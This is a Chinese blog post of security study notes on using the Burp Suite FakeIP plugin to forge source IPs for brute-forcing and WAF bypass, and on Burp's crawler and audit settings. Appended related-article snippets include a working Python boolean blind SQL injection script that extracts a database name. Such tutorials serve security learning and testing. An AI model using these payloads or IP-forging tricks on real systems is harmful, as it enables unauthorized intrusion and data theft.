泷羽Sec-Burp Suite IP伪造和爬虫审计

最新推荐文章于 2025-03-31 14:16:46 发布
原创 最新推荐文章于 2025-03-31 14:16:46 发布 · 913 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#tcp/ip #网络协议 #网络

声明!
学习视频来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec](https://space.bilibili.com/350329294)

一、安装插件

1.先安装jar文件,在安装插件

二、FakeIP使用

1.进行拦截,随便抓取一个包右键请求包,在"Extensions"选项,burpFakelP插件

customlP:生成指定
IP127.0.0.1:回环地址
randomlP:生成随机
IPAutoXFF:默认字段
生成了大量随机IP,在请求包中然后我们在将请求发送到爆破模块中,添加payload2.IP伪造和IP代理的区别

IP伪造在通过在修改或者伪造请求包中的源IP,来欺骗浏览器和绕过一些基础的waf的作用,也有一定的隐藏效果
IP伪造是伪造假的IP,只能绕过一些基础的防御而,IP代理池里的IP都是真实存在的,每一个请求都是正常的访问

三、爬虫和审计

点击"仪表盘"的首页,这有两个任务分别是 "新建扫描" 和 "新建实时任务"
1.我们先来看新建实时任务,分别有"实时审计"和"实时被动爬虫"
实时审计:
    是对通过代理的所有流量进行实时分析和检测,都是通过官方的POC进行验证
实时被动爬虫:
    不会主动向目标服务器发送请求,而是通过监听流量来收集信息。
实时审计的扫描设定:
    通过配置如何执行扫描的设置
审计优化:
    设置审计的速度和准确率
速度:
    快速,适中,全面

准确率:
    减少漏报率,适中,减少误报率
插入点的类型:
    URL的参数值,Body的参数值,cookie参数值,参数名称,HTTP报头,整个主体,URL路径的文件名,URL路径的文件夹
实时审计和实时被动爬虫结合,就能通过访问网站同时进行信息收集和实时审计,我们随便浏览几个网站,爬虫收集的信息都会传到"目标"的站点地图方便查看,我们在看实时审计,可能没有主动扫描来精确

2.新建扫描

我们在来看看新建扫描,分别有"爬虫与审计"和"爬虫"
爬虫与审计:    
    爬虫和审计同时进行,主动请求网站进行审计
爬虫:
    就主动请求服务器访问,不会进行审计
扫描设定:
    在速度和覆盖范围之间进行选择
轻量:速度最快,范围最小
快速:速度较快,范围较小
平衡:速度适中,范围适中
深度:深度最慢,范围最大
应用登录:
    碰到需要登录的页面,进行自动登录
资源池: 
    根据目标服务器的负担来设置扫捕的速度
设置后就确定开运行

[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
scrapy爬虫实战:伪装headers构造假IP骗过ip138.com
灵动的艺术的博客
12-06 5665
scrapy爬虫实战:伪装headers构造假IP骗过ip138.comscrapy 伪造useragent 我们在爬虫的过程中,经常遇到IP被封的情况,那么有没有伪装IP的方案呢,对于一些简单的网站我们只要伪造一下headers就可以了。 我们一般来说想知道自己的IP,只需要访问一下 http://www.ip138.com/ 就可以知道自己的IP了 使用浏览器检查工具,具体查看一下 就可以...
【渗透测试】---如何用burpsuite伪造IP
qq_43168364的博客
09-18 1万+
一、伪造方法 使用fakeIP.py插件来伪造IP。 fakeip.py是一个用python写的用来伪造IP的插件。 安装过程如下 二、安装jython-standalone-2.7.0 jython-standalone-2.7.0是一个将Python代码转换成Java代码的编译器。 能够将自己用Python代码写的类库,用在Java程序里。 安装的网址:http://search.maven.org/remotecontent?filepath=org/python/jython-standalo
Burpsuite 伪造 IP
最新发布
dilvx的博客
03-31 303
可以用于绕过 IP 封禁检测,用来暴力、绕过配额限制。也可以用来做 ff98sha 出的校赛题,要求用 129 个 /8 网段的 IP 地址访问同一个 domain。
Burpsuite插件 -- 伪造IP
Web安全工具库
08-04 6029
太阳不是突然落山的,我希望你们永远听不懂这句话。。。 ---- 网易云热评 今天给大家介绍一款Burpsuite插件,burpFakeIP 一、下载地址 https://github.com/TheKingOfDuck/burpFakeIP 二、安装插件 1、解压到本地 2、打开burpsuite,选择Extender,Add 3、选择下载好python插件,选择下一步 4、安装成功 三、使用方法 1、伪造指定ip,右击抓到的数据包,选择fakeip,i...
Burp suiteIP伪造
C-HOWE的博客
02-12 591
Burp Suite的FakeIP插件主要用于在安全测试中伪造IP地址,以绕过服务器的IP限制或WAF(Web应用防火墙)的封锁。IP伪造这么便捷为什么不适用IP伪装而去使用IP代理池呢因为IP伪造的每个数据包只是为了骗过浏览器、waf的请求,但是网络建立的连接确实实实在在的。
一个用于伪造IP地址进行爆破的BurpSuite插件:BurpFakeIP
qq_50854662的博客
09-24 4128
BurpFakeIP介绍 一个用于伪造ip地址进行爆破的BurpSuite插件,burpsuite伪造ip可用于突破waf及进行安全规则绕过等场景;昨天我们分享了《BurpSuite IP代理扩展,使用AWS API网关动态更改请求:IPRotate_Burp_Extension》有同学也发现今天推荐这个有点类似,但却又截然不同。毕竟AWS在国内确实太小众了,今天推荐的BurpFakeIP 伪造IP BurpSuite插件是你的另一个选择。 四个小功能 伪造指定ip伪造本地ip伪造随机ip随机ip
Burp一把梭之爬爬虫
2301_81684021的博客
12-19 2422
Burp Suite 是一款极为强大且广受欢迎的集成化 Web 应用安全测试工具,由多个协同运作的模块组成,旨在助力安全从业者、渗透测试人员以及安全爱好者全面剖析目标 Web 应用的安全性,精准探测各类潜在漏洞
Burp入门(10)-IP伪造插件
世界上没有所谓的天生如此,只是有人在坚持,不要因为自己不擅长而放弃努力
12-10 940
customIP是指你手动设置的固定IP地址。当你需要伪造一个特定的来源IP地址时,你可以设置一个自定义IP。例如,如果你让目标服务器认为请求是来自192.168.1.100,你将X-Forwarded-For头设置为该IP。使用自定义IP效果如下127.0.0.1。
Burp入门(4)-扫描功能介绍
世界上没有所谓的天生如此,只是有人在坚持,不要因为自己不擅长而放弃努力
11-27 1938
的教学本文介绍burp的主动扫描被动扫描功能。
红队专题-漏洞挖掘-代码审计
aming小老弟
03-11 1227
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
Burpsuite+1.7.26+Unlimited
05-05
如果运行不了,那么在命令行下允许 C:\Users\Administrator.USER-20180620GL> cd /D D:\soft\Burpsuite+1.7.26+Unlimited D:\soft\Burpsuite+1.7.26+Unlimited> java -jar BurpUnlimited.jar 一.设置代理:https://wenda.so.com/q/1370918176064761?src=140 首先在 IE选项--连接 页面中间选“从不进行拨号连接”,然后在 IE选项--连接--局域网设置里在“为LAN使用代理服务器”前的方框打勾,设置代理IP,端口 二.burp suite使用(一) - -- 抓包,截包,改包 https://blog.youkuaiyun.com/jinzhichaoshuiping/article/details/47324955 1.设置浏览器-代理 127.0.0.1 8080 2.配置burp监听端口,打开burp-》Proxy-》options-》add 三.burp suite使用(二) --- 爆破 https://blog.youkuaiyun.com/jinzhichaoshuiping/article/details/47347243 send to intruder 点击positions,选择要爆破的密码所处位置,默认的选择是出现的所有数字,被用黄色标出。 点击右边的clear$,所有的标记 选择错误密码所在的位置,点击add$,于是密码所在的位置被标记。
用于ip伪装身份的网络爬虫
wanbianip的博客
10-10 696
IP代理只能为web爬网程序更改IP。不同的IP地址都有使用爬虫的潜在动作,相当于给web爬虫一个真实的身份。但是爬虫在利用这个身份做事的时候,如果在别的地方暴露了自己的线索,那么这个身份就会被识别出来,甚至被拖进黑名单。这将导致该IP不再用于目标网站。如果您继续获取信息,您必须更改新的IP地址。可以,这个IP地址也可以切换。 这时,如果发现暴露的问题,找到相应的方法,换一个IP地址,再次伪装身份,就可以突破ip限制继续爬取采集信息。因此,万变ip代理可以帮助网络爬虫不断更换不同的IP伪装身份,达到快速抓取
python3爬虫伪装代理IP
sosososj的博客
11-27 1万+
在爬取类似 起点 色魔张大妈 这样的网站时,会被网站看出是爬虫机制,这时需要伪装成浏览器以及使用IP代理的方式来爬去正常内容。 实例 import re import requests import urllib.request from lxml import etree url='https://www.qidian.com/rank/hotsales' #浏览器伪装 # o...
Python爬虫-使用代理伪装IP_python爬虫ip伪装,身为一个网络安全程序员Context都没弄明白
2401_84182428的博客
04-10 1086
我们在做爬虫的过程中经常会遇到这样的情况,最初爬虫正常运行,正常抓取数据,一切看起来都是那么的美好,然而一杯茶的功夫可能就会出现错误,比如 403 Forbidden,这时候打开网页一看,可能会看到 “您的 IP 访问频率太高” 这样的提示,或者跳出一个验证码让我们输入,输入之后才可能解封,但是输入之后过一会儿就又这样了。
python伪装ip_Python爬虫:使用IP代理池伪装你的IP地址继续爬
weixin_39820173的博客
12-10 1788
让自己的 python 爬虫假装是浏览器小帅b主要是想让你知道在爬取网站的时候这是小编准备的python学习资料,关注,转发,私信小编“01”即可获取!要多的站在对方的角度想问题其实这泡妞差不多你要多站在妹纸的角度思考她的兴趣是什么她喜欢什么而不是自己感动自己单方面的疯狂索取哦..扯远了我们回到反爬虫这次教你怎么伪装自己的 ip 地址别让对方轻易的就把你给封掉如何伪装呢那么接下来就是学习 pyt...
【完美解决】爬虫伪装代理IP方案
热门推荐
xbean1028的博客
03-15 2万+
爬虫伪装代理IP 爬虫程序频繁访问某网站,很容易触发网站的保护机制,造成无法访问。本文将解决这一问题。 首先要伪装请求头,request默认是python-requests,emmm,这不是找事嘛,首先可以考虑改一下,然而,固定的还是容易被发现了,所以这里我用User-Agent随机生成。 But,仅仅伪装headers,使用随机 User-Agent来请求也会被发现,同一个ip地址,访问的次数太...
burp(8)-ip伪造爬虫审计
m0_72538839的博客
12-08 774
免责声明学习视频来自 B 站up主sec,如涉及侵权马上删除文章。笔记的只是方便各位师傅学习知识,以下代码、网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负。1、安装组件下载地址:🔑其作用是把Python代码转换成Java代码的编译器。
php 伪造ip爬虫,php采集模拟点击伪造IP,伪造浏览器useragent伪造来源防反爬虫例子--...
weixin_42299775的博客
03-12 262
$ch=curl_init();$curlurl="http://www.amztool.cn/index.php";$referurl="http://www.amztool.cn";$ip=mt_rand(11,191).".".mt_rand(0,240).".".mt_rand(1,240).".".mt_rand(1,240);//随机ip$agentarry=[//PC端...
布尔盲注burpsuite爆破
01-12
### 使用 Burp Suite 实现布尔盲注攻击爆破 #### 配置 Burp Suite 测试环境 为了成功执行布尔盲注攻击,需先配置好测试环境。启动 Kali 虚拟机并打开 Burp Suite 进入 Proxy 工具,在 Intercept 界面确认拦截状态为关闭 (Intercept is off)[^2]。 #### 设置代理浏览器 确保目标应用程序流量通过 Burp Suite 的代理发送。这通常涉及设置浏览器或其他 HTTP 客户端的代理设置指向运行 Burp Suite 的机器 IP 地址以及默认监听端口 8080[^1]。 #### 发现注入点 识别应用中的潜在 SQL 注入漏洞位置非常重要。这些地方通常是查询字符串参数、POST 数据字段或是 Cookie 中可被操纵的部分。对于布尔型盲注来说,重点在于观察页面响应的变化模式来判断是否存在注入可能性及其类型。 #### 构造有效载荷 构建用于检测提取信息的有效载荷是关键步骤之一。当知道库名长度为八时,可以设计如下形式的基础语句: ```sql AND ASCII(SUBSTRING((SELECT schema_name FROM information_schema.schemata LIMIT 1), position, 1)) > guess_value -- ``` 其中 `position` 表示当前猜测的位置(从1到8),而 `guess_value` 是用来比较ASCII码值的一个变量。如果返回真,则说明实际字符大于等于所猜数值;反之则小于该数[^4]。 #### 自动化过程 手动逐位推测效率低下且容易出错,因此建议编写 Python 或其他编程语言编写的脚本来自动化这一流程。下面是一个简单的Python例子,它会遍历每一个可能的字符直到找到匹配项为止: ```python import requests def check(payload): url = "http://example.com/vulnerable_page" params = {"param": payload} response = requests.get(url, params=params) # 根据实际情况修改条件表达式 return 'True condition' in response.text for i in range(1, 9): low, high = ord('a'), ord('z') while low <= high: mid = (low + high) >> 1 payload = f"' OR ASCII(SUBSTR(database(),{i},1))>{mid} AND '1'='1" if check(payload): low = mid + 1 else: high = mid - 1 print(chr(low)) ``` 此代码片段展示了如何利用二分查找算法高效地确定每个未知字符的具体值。请注意替换 URL 及相应参数以适应具体场景需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值